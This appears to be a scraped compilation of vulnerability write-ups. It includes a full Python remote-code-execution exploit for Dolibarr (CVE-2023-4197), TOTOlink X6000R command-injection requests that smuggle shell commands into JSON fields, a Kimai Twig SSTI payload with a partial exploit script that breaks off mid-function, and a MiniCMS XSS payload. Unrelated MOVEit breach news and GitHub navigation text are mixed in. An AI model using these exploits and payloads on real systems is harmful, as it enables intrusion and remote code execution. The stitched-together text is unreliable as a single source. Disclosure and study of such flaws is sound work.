Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 18.0.1

**Tested Versions**

17.0.1, 18.0.1

**CVE Identifier**

CVE-2023-4197

**CVE Description**

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**CWE Classification(s)**

CWE-20: Improper Input Validation

**CAPEC Classification(s)**

CAPEC-248 Command Injection CAPEC-153: Input Data Manipulation

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

High

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for <?php and <?=, allowing usage of the <? short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP.

**Vulnerability Details:**

There are two ways to exploit this vulnerability, one is to “import” content from a specified URL; the other is to edit an existing page.

The vulnerable code can be found in the function dolKeepOnlyPhpCode(), inside the /core/lib/website.lib.php file. where no checking for the <? tag is done. This function intended purpose is to extract the PHP code from the given string and return it to the caller. The caller would throw an error if this function returns a non-empty string since it indicates the presence of PHP code.

    /core/lib/website.lib.php:
    <?php
    
    function dolKeepOnlyPhpCode($str)
    {
        $str = str_replace('<?=', '<?php', $str);
    
        $newstr = '';
    
        // Split on each opening tag
        //$parts = explode('<?php', $str);
        $parts = preg_split('/'.preg_quote('<?php', '/').'/i', $str);
    
        if (!empty($parts)) {
            $i = 0;
            foreach ($parts as $part) {
                if ($i == 0) {  // The first part is never php code
                    $i++;
                    continue;
                }
                $newstr .= '<?php';
                //split on closing tag
                $partlings = explode('?>', $part, 2);
                if (!empty($partlings)) {
                    $newstr .= $partlings[0].'?>';
                } else {
                    $newstr .= $part.'?>';
                }
            }
        }
        return $newstr;
    }
    

This function takes in a single argument which is the string to sanitize. It first replaces all occurrences of <?= with <?php and subsequently all <?php tags are tokenized, and the string between the opening and optional closing tags are selected and returned to the caller.

In order to achieve RCE, the adversary must first be authenticated with an account and the Website module must be enabled. Then, modify an existing web page to include the <? tag where arbitrary PHP code can be executed. Command execution is achieved by using any of the PHP functions that executes system code (i.e. system()). After the web page is modified successfully, previewing the updated page would trigger the RCE:

**Exploit Conditions:**

This vulnerability can be exploited when the “Website” module is enabled, as well as having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197)
    # Via: https://TARGET_HOST/website/index.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    import sys
    import uuid
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====\n")
    
        if len(sys.argv) != 5:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD CMD_TO_EXECUTE".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
        cmd = sys.argv[4]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def rce():
        # Create web site
        print("[+] Attempting to create a website...")
        website_name = uuid.uuid4().hex
        data = {
            "WEBSITE_REF": website_name,
            "token": csrf_token,
            "action": "addsite",
            "WEBSITE_LANG": "en",
            "addcontainer": "create"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Website - {website_name}" not in res.text:
            print("[!] Website creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created website name: \"{website_name}\"!")
    
        # Create web page
        print("[+] Attempting to create a web page...")
        webpage_name = uuid.uuid4().hex
        data = {
            "website": website_name,
            "token": csrf_token,
            "action": "addcontainer",
            "WEBSITE_TYPE_CONTAINER": "page",
            "WEBSITE_TITLE": "x",
            "WEBSITE_PAGENAME": webpage_name
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Contenair \\'{webpage_name}\\' added" not in res.text:
            print("[!] Web page creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created web page name: \"{webpage_name}\"!")
    
        # Modify created page
        print("[+] Attempting to modify the web page...")
        webpage_id = re.search(f"<option value=\"(.+)\" .+{webpage_name}", res.text).group(1).strip()
        data = {
            "website": website_name,
            "WEBSITE_PAGENAME": webpage_name,
            "pageid": webpage_id,
            "token": csrf_token,
            "action": "updatemeta",
            "htmlheader": f"<? echo system('{cmd}'); ?>"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if "Saved" not in res.text:
            print("[!] Web page modification failed!")
            sys.exit(1)
        else:
            print("[+] Web page modified successfully!")      
    
        # Trigger RCE
        print(f"[+] Triggering RCE now via: {target}/public/website/index.php?website={website_name}&pageref={webpage_name}")
        res = s.get(f"{target}/public/website/index.php?website={website_name}&pageref={webpage_name}", verify=False)
        if res.status_code != 200:
            print("[!] Web page is not reachable!")
            sys.exit(1)
        else:
            output = re.findall("block -->\n(.+)</head>", res.text, re.MULTILINE | re.DOTALL)[0].strip()
            print(f"[+] RCE successful! Output of command:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        rce()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the /document/ directory (default upload directory) to see if there are any .tpl files containing <? tags, and further inspecting the code contained within.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner acknowledged vulnerability and pushed a patch commit. Also mentioned that it will be in the next release
*   2023-10-11 New version containing patch released
*   2023-11-01 Public Release

CVE-2023-4197: (CVE-2023-4197) Dolibarr ERP CRM (


Poorly constructed webap requests and URI components with special characters trigger unhandled errors and exceptions, disclosing
information about the underlying technology and other sensitive information details. The website unintentionally reveals sensitive information including technical details like version Info, endpoints,
backend server, Internal IP. etc., which can potentially expose additional attack surface containing other interesting vulnerabilities. 



CVE-2023-5516

Stored Cross Site Scripting (XSS) vulnerability in MiniCMS 1.1.1 allows attackers to run arbitrary code via crafted string appended to /mc-admin/conf.php.

1.Environment download address: https://codeload.github.com/bg5sbk/MiniCMS/zip/refs/tags/v1.11

2.Log in to the background page to go to the following URL

 /mc-admin/conf.php 

3.At the site address, enter: javascript:alert(1)

4.xss is triggered by clicking on my website at /mc-admin/head.php

CVE-2023-46378: Minicms1.1.1 Exists storage xss

Cross Site Request Forgery vulnerability in Click Studios (SA) Pty Ltd Passwordstate v.Build 9785 and before allows a local attacker to execute arbitrary code via a crafted request.

Incident Management Advisories

**Major Incidents**

**Click Studios has an established Incident Management Plan that is used in the event of major incidents affecting Passwordstate’s operation.**

As part of the Incident Management Process, Click Studios will email all customers advising to check this advisories page for updates. Advisories detail the best known information available, at a point in time, and are the only authorized updates for existing and potential customers, media and interested parties. By publishing these advisories, representing the single source of truth, Technical Support Team members, developers and Pre-Sales staff can focus solely on assisting customers with the major incident.

Please be aware that emails to Sales or Support, requesting additional information, will be replied to with a standard response directing the requestor to this Advisories page. Please understand, if Click Studios invokes the Incident Management Plan, our number one priority is working with our customers to identify if they have been affected and advising them of required remedial actions.

We recommend any interested party periodically check this advisories page for the latest updates.

**Advisories:**

There are no current major incidents at this time.

**Common Vulnerabilities and Exposures:**

The table below provides a list of Click Studios confirmed information-security vulnerabilities and exposures for Passwordstate or associated modules. Interested parties can subscribe to this list to be notified when new CVEs are added.

**_Date_**

*   2023-09-25
*   2023-08-31
*   2022-11-07
*   2022-09-05
*   2022-09-05
*   2020-10-29
*   2020-10-05
*   2018-08-01

**_CVE(s)_**

*   CVE Pending
*   CVE-2023-43295
*   CVE-2022-3877
*   CVE-2022-3875
*   CVE-2022-3876
*   CVE-2020-27747
*   CVE-2020-26061
*   CVE-2018-14776

**_Severity_**

*   Low
*   Low
*   Medium
*   High
*   Medium
*   Low
*   High
*   Low

**_Product_**

*   Passwordstate API
*   Passwordstate Core
*   Passwordstate Core
*   Passwordstate API
*   Passwordstate API
*   Mobile Web Site (Deprecated)
*   Password Reset Portal
*   Passwordstate Core

**_Description_**

*   Incorrect Access Control allowing the potential for an existing Security Administrator to use the System Wide API Key to interact with private password lists for Password History, delete and copy/move API endpoints.
*   Fixed a potential Cross-Site Request Forgery (CSRF) failure, for authenticated sessions, which allowed remote attackers who are able to trick a user into retrying a request to bypass CSRF protection and replay a carefully crafted request.
*   Cross site scripting vulnerability for URL field
*   Authentication bypass by assumed-immutable data
*   Manipulation of the argument PasswordID leads to authorization bypass
*   Lack of brute force attack detection on PIN code authentication
*   A well crafted HTTP request allowed setting a password for a registered user
*   XSS by authenticated users via an uploaded HTML document

**_Fixed_**

*   Build 9811
*   Build 9795
*   Build 9653
*   Build 9611
*   Build 9611
*   Build 8987
*   Build 8501
*   Build 8397

**Subscribe to our Annoucements/Advisories RSS Feed

Subscribe to our RSS Feed for the latest announcements and security advisories.

Simply add the URL of https://forums.clickstudios.com.au/forum/6-announcements.xml to your favorite RSS Reader.

  

**

CVE-2023-43295: Security - Click Studios

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

An issue in TP-Link Tapo C100 v1.1.15 Build 211130 Rel.15378n(4555) and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted web request.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39610: publications/1.TP-Link Tapo C100 - HTTP Denial-Of-Service at main · zn9988/publications

By Deeba Ahmed
The damage from the MOVEit hack is slowly emerging.
This is a post from HackRead.com Read the original post: Massive MOVEit Hack: 630K+ US Defense Officials’ Emails Breached

The organization targeted in the incident is Westat, a data firm utilized by the Office of Personnel Management (OPM) for survey administration.

The MOVEit data breach has caused havoc across all prominent industries and organizations. This large-scale cyberattack in May 2023 (from May 28th to May 30th, 2023) has claimed countless victims.

The attackers exploited a vulnerability in a managed file transfer software called MOVEit Transfer developed by Ipswitch INC. Many organizations have become targets of this breach including government agencies, airlines, educational and financial institutions and healthcare providers, and lost sensitive data such as credit card numbers, PII, and SSNs (social security numbers).

Bloomberg reports that the US Department of Justice is amongst the government agencies targeted in the MOVEit Transfer vulnerability exploitation spree. Reportedly, the email addresses of 632,000 employees from the agencies were accessed. 

According to the Office of Personnel Management’s (OPM) documents obtained through the Freedom of Information Act request, hackers obtained access to email addresses linked to government employee surveys and internal agency tracking codes by exploiting the MOVEit file transfer program used by Westat, a data firm the OPM uses for administer surveys.

Impacted employees mostly belonged to the Defense Department, including the Air Force, the Army, the Army Corps of Engineers, the Office of the Secretary of Defense and the Joint Staff officials.

Hackread.com has been following the series of cyberattacks that took place in May 2023. The Russian-speaking cybercrime group Cl0p ransomware gang is blamed for exploiting this vulnerability. The gang made the stolen data public, impacting hundreds of government entities and businesses worldwide.  

In June 2023, the National Student Clearinghouse reported that 900 US schools were impacted by the MOVEit hack, with hackers stealing sensitive student records. In October, Sony confirmed that the data breach caused by the exploitation of MOVEit vulnerability has impacted 6791 of its previous and current employees or their family members,

Progress (formally Ipswitch) released a patch for the vulnerability but many organizations haven’t yet applied the patch and remain vulnerable to cyberattacks. The full extent of damage caused by the breach in May is yet unknown but quite possibly hackers gained access to classified data.

Commenting on this latest development, security awareness advocate at KnowBe4, Eric Kron, told Hackread that the Cl0p ransomware group has continuously made headlines for its attacks exploiting the MOVEit vulnerability, and has emerged as an unconventional gang that doesn’t bother about encrypting the data or disruption of service. This is why in many cases victims of data breaches remain unaware because there aren’t any ‘evident signs.’

“This group continues to make the news due to its exploits against MOVEit and the tactics it employed. Unlike the more traditional ransomware gangs that are operating this group does not bother with the encryption of the data and subsequent disruption of services. This means that in many cases the victims may not realise they are suffering a breach because there are no extremely evident signs such as failures of service or systems going offline.”

“While the group promised to delete information related to governments, cities or police departments, it seems highly unlikely that this group is to be trusted. While they may not leak this information publicly, it could be of great interest to other nation states looking to gather intelligence on American citizens or government agencies, potentially offering them a source of income if willing to sell the information to these entities.”

“Since patches are available for the MOVEit software, organisations must ensure they’ve been applied. Any organisations that have operated the software during the times of known attacks would be wise to ensure that there is no sign of previous exploitation of these vulnerabilities, even if they have not been approached with a ransom demand yet,” Kron added.

****_RELATED ARTICLES_****

1.  IT Security firm Qualys extorted by Clop gang after data breach
2.  Clop ransomware gang leaks Jones Day law firm data on dark web
3.  Human Error: Casio ClassPad Data Breach Impacting 148 Countries
4.  UK’s Ofcom confirms cyber attack as PoC exploit for MOVEit is released
5.  Cisco Web UI Vulnerability Exploited Massly, Impacting Over 40K Devices

Massive MOVEit Hack: 630K+ US Defense Officials’ Emails Breached

Hamas posted gruesome images and videos that were designed to go viral. Sources argue that Telegram’s lax moderation ensured they were seen around the world.

How Telegram Became a Terrifying Weapon in the Israel-Hamas War

Kimai is a web-based multi-user time-tracking application. Versions 2.1.0 and prior are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities. As of time of publication, no patches or known workarounds are available.

The laters version of Kimai is found to be vulnerable to a critical Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities.

The vulnerability is triggered when the software attempts to render invoices, allowing the attacker to execute arbitrary code on the server.

Steps to Reproduce (Manually):  
1- Upload a malicious Twig file to the server containing the following payload {{['id>/tmp/pwned']|map('system')|join}}  
2- Trigger the SSTI vulnerability by downloading the invoices.  
3- The malicious code gets executed, leading to RCE.  
4- /tmp/pwned file will be created on the target system

import requests
import re
import string
import random
import sys

session \= requests.session()
BASE\_URL \= sys.argv\[1\]

def generate(size\=6, chars\=string.ascii\_uppercase + string.digits):
    return ''.join(random.choice(chars) for \_ in range(size))

def get\_csrf(path, session):
    try:
        project\_id \= ""
        csrf\_token \= ""
        preview\_id \= ""
        template\_ids \= \[\]
        activity\_customer\_list \= \[\]
        
        csrf\_login\_response \= session.get(f"{BASE\_URL}{path}").text
        
        \# Extract CSRF Token
        pattern \= re.compile(r'<input\[^>\]\*?name=\["\\'\].\*?token\[^"\\'\]\*\["\\'\]\[^>\]\*?value=\["\\'\](.\*?)\["\\'\]\[^>\]\*?>', re.IGNORECASE)
        match \= pattern.search(csrf\_login\_response)
        if match:
            csrf\_token \= match.group(1)
        
        if "performSearch" in path:
            preview\_pattern \= re.compile(r'<div\[^>\]\*id="preview-token"\[^>\]\*data-value="(.\*?)"\[^>\]\*>', re.IGNORECASE)
            preview\_match \= preview\_pattern.search(csrf\_login\_response)
            if preview\_match:
                preview\_id \= preview\_match.group(1)

        
        template\_pattern \= re.compile(r'<option value="(\\d+)" selected="selected">', re.IGNORECASE)
        template\_matches \= template\_pattern.findall(csrf\_login\_response)
        if template\_matches:
            template\_ids \= \[int(id) for id in template\_matches\]
        
        if "timesheet" in path:
            option\_pattern \= re.compile(r'<option value="(\\d+)" data-customer="(\\d+)" data-currency="EUR">', re.IGNORECASE)
            option\_matches \= option\_pattern.findall(csrf\_login\_response)
            if option\_matches:
                activity\_customer\_list \= \[(int(activity\_id), int(customer\_id)) for activity\_id, customer\_id in option\_matches\]
        
        if "project" in path or "activity" in path:
            project\_id\_match \= re.search(r'<option value="(\\d+)"\[^>\]\*data-currency="EUR"\[^>\]\*>', csrf\_login\_response)
            if project\_id\_match:
                project\_id \= project\_id\_match.group(1)
        
        return csrf\_token, project\_id, preview\_id, template\_ids, activity\_customer\_list
    
    except Exception as e:
        print(f"Error occurred: {e}")
        return None, None, None, None, None

def login(username,password,csrf,session):
    try:
        params \= {"\_username": username, "\_password": password, "\_csrf\_token": csrf}
        login\_response \= session.post(f"{BASE\_URL}/login\_check", data\=params, allow\_redirects\=True)
        if "I forgot my password" not in login\_response.text:
            print(f"\[+\] Logged in: {username}")
            return session
        else:
            print("Wrong username,password", username)
            exit(1)
    except Exception as e:
        print(str(e))
        pass

def create\_customer(token,name,session):
    try:

        data \= {
            'customer\_edit\_form\[name\]': (None, name),
            'customer\_edit\_form\[color\]': (None, ''),
            'customer\_edit\_form\[comment\]': (None, 'xx'),
            'customer\_edit\_form\[address\]': (None, 'xx'),
            'customer\_edit\_form\[company\]': (None, ''),
            'customer\_edit\_form\[number\]': (None, '0002'),
            'customer\_edit\_form\[vatId\]': (None, ''),
            'customer\_edit\_form\[country\]': (None, 'DE'),
            'customer\_edit\_form\[currency\]': (None, 'EUR'),
            'customer\_edit\_form\[timezone\]': (None, 'UTC'),
            'customer\_edit\_form\[contact\]': (None, ''),
            'customer\_edit\_form\[email\]': (None, ''),
            'customer\_edit\_form\[homepage\]': (None, ''),
            'customer\_edit\_form\[mobile\]': (None, ''),
            'customer\_edit\_form\[phone\]': (None, ''),
            'customer\_edit\_form\[fax\]': (None, ''),
            'customer\_edit\_form\[budget\]': (None, '0.00'),
            'customer\_edit\_form\[timeBudget\]': (None, '0:00'),
            'customer\_edit\_form\[budgetType\]': (None, ''),
            'customer\_edit\_form\[visible\]': (None, '1'),
            'customer\_edit\_form\[billable\]': (None, '1'),
            'customer\_edit\_form\[invoiceTemplate\]': (None, ''),
            'customer\_edit\_form\[invoiceText\]': (None, ''),
            'customer\_edit\_form\[\_token\]': (None, token),
        }


        response \= session.post(f"{BASE\_URL}/admin/customer/create", files\=data)

    except Exception as e:
        print(str(e))

def create\_project(token, name,project\_id ,session):
    try:
        form\_data \= {
            'project\_edit\_form\[name\]': (None, name),
            'project\_edit\_form\[color\]': (None, ''),
            'project\_edit\_form\[comment\]': (None, ''),
            'project\_edit\_form\[customer\]': (None, project\_id), 
            'project\_edit\_form\[orderNumber\]': (None, ''),
            'project\_edit\_form\[orderDate\]': (None, ''),
            'project\_edit\_form\[start\]': (None, ''),
            'project\_edit\_form\[end\]': (None, ''),
            'project\_edit\_form\[budget\]': (None, '0.00'),
            'project\_edit\_form\[timeBudget\]': (None, '0:00'),
            'project\_edit\_form\[budgetType\]': (None, ''),
            'project\_edit\_form\[visible\]': (None, '1'),
            'project\_edit\_form\[billable\]': (None, '1'),
            'project\_edit\_form\[globalActivities\]': (None, '1'),
            'project\_edit\_form\[invoiceText\]': (None, ''),
            'project\_edit\_form\[\_token\]': (None, token)
        }
        
        response \= session.post(f"{BASE\_URL}/admin/project/create", files\=form\_data)
        
    except Exception as e:
        print(str(e))

def create\_activity(token, name,project\_id ,session):
    try:
        form\_data \= {
            'activity\_edit\_form\[name\]': (None, name),
            'activity\_edit\_form\[color\]': (None, ''),
            'activity\_edit\_form\[comment\]': (None, ''),
            'activity\_edit\_form\[project\]': (None, ''),
            'activity\_edit\_form\[budget\]': (None, '0.00'),
            'activity\_edit\_form\[timeBudget\]': (None, '0:00'),
            'activity\_edit\_form\[budgetType\]': (None, ''),
            'activity\_edit\_form\[visible\]': (None, '1'),
            'activity\_edit\_form\[billable\]': (None, '1'),
            'activity\_edit\_form\[invoiceText\]': (None, ''),
            'activity\_edit\_form\[\_token\]': (None, token),
        }
        
        response \= session.post(f"{BASE\_URL}/admin/activity/create", files\=form\_data)
        
        if response.status\_code \== 201:
            print(f"\[+\] Activity created: {name}")

    except Exception as e:
        print(f"An error occurred: {str(e)}")

def upload\_malicious\_document(token,session):
    try:
        form\_data \= {
